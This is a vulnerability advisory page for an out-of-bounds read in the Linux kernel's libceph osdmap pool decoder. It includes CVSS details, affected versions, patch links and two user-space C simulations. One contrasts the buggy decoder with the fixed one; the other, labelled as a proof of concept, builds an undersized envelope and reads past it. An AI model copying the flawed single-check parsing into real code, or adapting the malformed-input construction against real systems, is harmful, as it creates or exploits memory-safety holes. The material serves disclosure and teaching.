Security Vulnerability Report
CVE-2025-71116 CVSS 7.1 HIGH

Published: 2026-01-14 15:16:01
Last Modified: 2026-03-25 18:59:54
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

libceph: make decode_pool() more resilient against corrupted osdmaps

If the osdmap is (maliciously) corrupted such that the encoded length of ceph_pg_pool envelope is less than what is expected for a particular encoding version, out-of-bounds reads may ensue because the only bounds check that is there is based on that length value.

This patch adds explicit bounds checks for each field that is decoded or skipped.
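The description above is the whole mechanism: a length-prefixed envelope whose length is trusted as the only bound, followed by a version-dependent sequence of fixed-size and length-prefixed fields. One practical note before the code: the osdmap a kernel client decodes is received from the Ceph cluster, so the "maliciously corrupted" input is data arriving over the wire from a cluster (or whoever can speak for it) that the client does not fully trust, whatever the AV:L in the CVSS vector suggests. The C below is an added example written for this page, not the kernel's decode_pool() and not taken from the fix commits listed further down. It models the envelope with a simplified, assumed field layout (ev, cv and len header; type, size, crush_ruleset, object_hash; pg_num, pgp_num; a 24-byte skipped region; a snaps list of length-prefixed entries; flags; and read_tier/write_tier only for ev >= 9), and walks it once in the pre-fix shape (the check on len is the only check) and once with the per-field guard the fix describes. The names NEED, decode_pool, build_pool_msg and run_case, and the sample encoding, are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef const uint8_t *cur_t;

/* Subset of the ceph_pg_pool fields; the envelope layout used below is this
 * example's simplified model, not the kernel's definition. */
struct pool_info {
	uint8_t type, size, crush_ruleset, object_hash;
	uint32_t pg_num, pgp_num;  uint64_t flags, read_tier, write_tier;
};

static uint64_t get_le(cur_t *p, int n)          /* little-endian read, advances *p */
{
	uint64_t v = 0;
	for (int i = 0; i < n; i++) v |= (uint64_t)(*p)[i] << (8 * i);
	*p += n;
	return v;
}

static void put_le(uint8_t *dst, uint64_t v, int n)
{
	for (int i = 0; i < n; i++) dst[i] = (uint8_t)(v >> (8 * i));
}

/* The per-field guard the fix adds: refuse any read or skip that would cross
 * pool_end. With checked == 0 the same walk behaves like the pre-fix code. */
#define NEED(n) \
	do { if (checked && (size_t)(pool_end - *p) < (size_t)(n)) return -1; } while (0)
/* Returns -1 on rejection, otherwise how many bytes the walk read beyond end
 * (0 for a well-formed encoding). Unchecked, a short envelope sends the cursor
 * past pool_end and past end; callers keep zeroed slack after end for that. */
static long decode_pool(cur_t *p, cur_t end, struct pool_info *pi, int checked)
{
	if (end - *p < 6) return -1;
	uint8_t ev = (uint8_t)get_le(p, 1);  (void)get_le(p, 1);   /* ev, cv */
	uint32_t len = (uint32_t)get_le(p, 4);
	if ((size_t)(end - *p) < len) return -1;         /* pre-fix: the only check */
	cur_t pool_end = *p + len;
	NEED(4 + 4 + 4 + 24);
	pi->type = (uint8_t)get_le(p, 1);            pi->size = (uint8_t)get_le(p, 1);
	pi->crush_ruleset = (uint8_t)get_le(p, 1);   pi->object_hash = (uint8_t)get_le(p, 1);
	pi->pg_num = (uint32_t)get_le(p, 4);         pi->pgp_num = (uint32_t)get_le(p, 4);
	*p += 24;                       /* skip lpg_num, lpgp_num, last_change, snap_seq, snap_epoch */
	NEED(4);
	uint32_t num = (uint32_t)get_le(p, 4);           /* skip snaps */
	while (num--) {
		NEED(8 + 2 + 4);
		*p += 8 + 2;                             /* snapid, versions */
		uint32_t blob = (uint32_t)get_le(p, 4);
		NEED(blob);                              /* inner length is attacker data too */
		*p += blob;
	}
	NEED(8);
	pi->flags = get_le(p, 8);
	if (ev >= 9) {                                   /* fields only newer encodings carry */
		NEED(16);
		pi->read_tier = get_le(p, 8);
		pi->write_tier = get_le(p, 8);
	}
	long overrun = *p > end ? (long)(*p - end) : 0;
	*p = pool_end;
	return overrun;
}

/* Constructed sample: a well-formed ev=9 encoding. If claimed is smaller than the
 * real field size, len is rewritten to claimed and the message is cut there, the
 * corruption the advisory describes. Returns the message length. */
static size_t build_pool_msg(uint8_t *out, uint8_t ev, uint32_t claimed)
{
	uint8_t *b = out + 6;  size_t n = 0;
	b[n++] = 1; b[n++] = 3; b[n++] = 0; b[n++] = 2;   /* type, size, crush_ruleset, object_hash */
	put_le(b + n, 128, 4); n += 4;                   /* pg_num */
	put_le(b + n, 128, 4); n += 4;                   /* pgp_num */
	memset(b + n, 0, 24); n += 24;                   /* lpg_num .. snap_epoch */
	put_le(b + n, 0, 4); n += 4;                     /* no snaps */
	put_le(b + n, 1, 8); n += 8;                     /* flags */
	if (ev >= 9) {
		put_le(b + n, UINT64_MAX, 8); n += 8;    /* read_tier */
		put_le(b + n, UINT64_MAX, 8); n += 8;    /* write_tier */
	}
	if (claimed < n) n = claimed;
	out[0] = ev; out[1] = 5; put_le(out + 2, n, 4);
	return 6 + n;
}

/* Decode a sample whose envelope claims `claimed` bytes (UINT32_MAX = honest). */
long run_case(uint32_t claimed, int checked)
{
	uint8_t buf[512] = {0};                          /* message plus zeroed slack */
	size_t n = build_pool_msg(buf, 9, claimed);
	struct pool_info pi = {0};  cur_t p = buf;
	return decode_pool(&p, buf + n, &pi, checked);
}

int main(void)
{
	printf("honest: %ld/%ld  len=40: %ld/%ld  len=4: %ld/%ld  (unchecked overrun / checked rc)\n",
	       run_case(UINT32_MAX, 0), run_case(UINT32_MAX, 1), run_case(40, 0), run_case(40, 1),
	       run_case(4, 0), run_case(4, 1));
	return 0;
}
```

With the honest 64-byte envelope both walks agree and nothing is read past the message. With len rewritten to 4 the single check still passes (the message does hold 4 bytes), and the unchecked walk reads 60 bytes beyond the end of the message before it stops; with len 40 it fails later, in the flags read, after having consumed a snaps count from whatever followed. The guard here compares against pool_end rather than end: an envelope that cannot hold the fields its version implies is malformed regardless of how much message follows it, and checking the inner blob length the same way keeps the snaps skip from being steered past the envelope. The zeroed slack in run_case is what keeps this demonstration itself in bounds; the kernel reading from a message buffer has no such slack.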

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
Vector breakdown: Attack Vector Local, Attack Complexity Low, Privileges Required Low, User Interaction None, Scope Unchanged, Confidentiality High, Integrity None, Availability High (exploitability subscore 1.8, impact subscore 5.2)
Weakness: CWE-125 (Out-of-bounds Read)

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE, from 3.9.1 before 5.10.248
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE, from 5.11 before 5.15.198
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE, from 5.16 before 6.1.160
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE, from 6.2 before 6.6.120
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE, from 6.7 before 6.12.64
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE, from 6.13 before 6.18.3
cpe:2.3:o:linux:linux_kernel:3.9:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* through 6.19:rc8 - VULNERABLE
Linux kernel libceph (versions before the fix commits listed below; the upper bounds above are the first fixed release on each stable branch)
The exact affected and fixed versions for a given Linux distribution should be taken from that distribution's security advisory, since distribution kernels carry backports under their own version numbers.
Related kernel commit: 145d140abda80e33331c5781d6603014fa75d258
Related kernel commit: 2acb8517429ab42146c6c0ac1daed1f03d2fd125
Related kernel commit: 5d0d8c292531fe356c4e94dcfdf7d7212aca9957
Related kernel commit: 8c738512714e8c0aa18f8a10c072d5b01c83db39
Related kernel commit: c82e39ff67353a5a6cbc07b786b8690bd2c45aaa

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is a stand-alone user-space simulation of the decoding logic: it builds a pool encoding with an undersized envelope length and a decoder that checks only that length, then reads past it. It does not construct a real Ceph osdmap message, does not link against libceph and does not exercise the kernel, so it is not evidence of exploitability on any given system.
c
/*
 * PoC for CVE-2025-71116: libceph decode_pool() out-of-bounds read
 *
 * This PoC models the bug in user space: it builds a pool encoding whose
 * envelope length is smaller than the fields the decoder expects, then runs
 * a decoder that, like the pre-fix kernel code, checks only that envelope
 * length and keeps reading past it.
 *
 * Note: this is a stand-alone simulation. It does not use libceph, does not
 * build a real Ceph osdmap message and does not touch the kernel.
 * For demonstration purposes only.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Simulated ceph osdmap container (not used by the decoder below) */
struct ceph_osdmap {
	uint32_t epoch;
	uint32_t pool_max;
	uint8_t *data;
	size_t data_len;
};

/* Layout produced: [tag:1][pool_id:4][envelope_len:4][payload:256] */
#define HDR_LEN     (1 + 4 + 4)
#define PAYLOAD_LEN 256

/* Malicious pool encoding with undersized envelope length */
static uint8_t *create_malicious_osdmap(size_t *out_len)
{
	size_t total = HDR_LEN + PAYLOAD_LEN;
	uint8_t *buf = malloc(total);
	size_t pos = 0;

	if (!buf)
		return NULL;

	/* Tag byte used by this simulation (0x4 is not a libceph constant) */
	buf[pos++] = 0x4;

	/* Pool ID = 1, little-endian */
	buf[pos++] = 0x01;
	buf[pos++] = 0x00;
	buf[pos++] = 0x00;
	buf[pos++] = 0x00;

	/* Maliciously undersized envelope length: 8, far less than the fields
	 * a decoder expects for the encoding version */
	buf[pos++] = 0x08;
	buf[pos++] = 0x00;
	buf[pos++] = 0x00;
	buf[pos++] = 0x00;

	/* Filler the decoder will read once it runs past the envelope */
	memset(buf + pos, 0x41, PAYLOAD_LEN);

	*out_len = total;
	return buf;
}

/* Simulated vulnerable decode_pool function */
static int decode_pool_vulnerable(const uint8_t *data, size_t len)
{
	size_t pos = 0;
	uint32_t envelope_len;

	/* Skip the tag and pool ID written by create_malicious_osdmap() */
	if (len < HDR_LEN)
		return -1;
	pos += 1 + 4;

	/* Read envelope length (attacker controlled), little-endian */
	envelope_len = (uint32_t)data[pos] | (uint32_t)data[pos + 1] << 8 |
		       (uint32_t)data[pos + 2] << 16 | (uint32_t)data[pos + 3] << 24;
	pos += 4;

	/* Vulnerable: the only bounds check is against the attacker-controlled
	 * envelope length, which says nothing about the fields decoded next */
	if (pos + envelope_len > len)
		return -1;

	/* Decode fields without per-field checks: the reads continue past the
	 * envelope. Here they stay inside the 265-byte buffer; in the kernel
	 * the same walk can cross the end of the osdmap buffer. */
	for (size_t i = 0; i < envelope_len + 100; i++) {
		volatile uint8_t val = data[pos + i];
		printf("Reading byte at offset %zu: 0x%02x%s\n", pos + i, val,
		       i >= envelope_len ? "  <-- beyond envelope" : "");
	}
	return 0;
}

int main(void)
{
	size_t osdmap_len;
	uint8_t *malicious_osdmap;
	int result;

	printf("CVE-2025-71116 PoC - libceph decode_pool OOB Read\n");
	printf("================================================\n\n");

	malicious_osdmap = create_malicious_osdmap(&osdmap_len);
	if (!malicious_osdmap)
		return 1;
	printf("Created malicious osdmap, length: %zu bytes\n", osdmap_len);
	printf("Attempting to trigger OOB read in decode_pool()...\n\n");

	result = decode_pool_vulnerable(malicious_osdmap, osdmap_len);
	if (result == 0)
		printf("\nRead past the envelope - simulated vulnerability confirmed\n");
	else
		printf("\nFailed to trigger vulnerability\n");

	free(malicious_osdmap);
	return 0;
}

References

https://git.kernel.org/stable/c/145d140abda80e33331c5781d6603014fa75d258 (Patch)
https://git.kernel.org/stable/c/2acb8517429ab42146c6c0ac1daed1f03d2fd125 (Patch)
https://git.kernel.org/stable/c/5d0d8c292531fe356c4e94dcfdf7d7212aca9957 (Patch)
https://git.kernel.org/stable/c/8c738512714e8c0aa18f8a10c072d5b01c83db39 (Patch)
https://git.kernel.org/stable/c/c82e39ff67353a5a6cbc07b786b8690bd2c45aaa (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71116", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:01.277", "lastModified": "2026-03-25T18:59:53.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make decode_pool() more resilient against corrupted osdmaps\n\nIf the osdmap is (maliciously) corrupted such that the encoded length\nof ceph_pg_pool envelope is less than what is expected for a particular\nencoding version, out-of-bounds reads may ensue because the only bounds\ncheck that is there is based on that length value.\n\nThis patch adds explicit bounds checks for each field that is decoded\nor skipped."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nlibceph: hacer decode_pool() más resistente contra osdmaps corruptos\n\nSi el osdmap está (maliciosamente) corrupto de tal manera que la longitud codificada del envoltorio ceph_pg_pool es menor de lo que se espera para una versión de codificación particular, pueden producirse lecturas fuera de límites porque la única comprobación de límites que existe se basa en ese valor de longitud.\n\nEste parche añade comprobaciones de límites explícitas para cada campo que se decodifica o se omite."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": 
[{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.9.1", "versionEndExcluding": "5.10.248", "matchCriteriaId": "32B8D212-DEC8-414B-8730-B7E649522F2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.198", "matchCriteriaId": "82159CAA-B6BA-43C6-85D8-65BDBC175A7E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.160", "matchCriteriaId": "C10CC03E-16A9-428A-B449-40D3763E15F6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.120", "matchCriteriaId": "43C3A206-5EEE-417B-AA0F-EF8972E7A9F0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.64", "matchCriteriaId": "32BF4A52-377C-44ED-B5E6-7EA5D896E98B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.3", "matchCriteriaId": "2DC484D8-FB4F-4112-900F-AE333B6FE7A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.9:-:*:*:*:*:*:*", "matchCriteriaId": "526A1838-B777-4270-82B2-E8BC398CB046"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": 
"13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/145d140abda80e33331c5781d6603014fa75d258", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2acb8517429ab42146c6c0ac1daed1f03d2fd125", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5d0d8c292531fe356c4e94dcfdf7d7212aca9957 ... (truncated)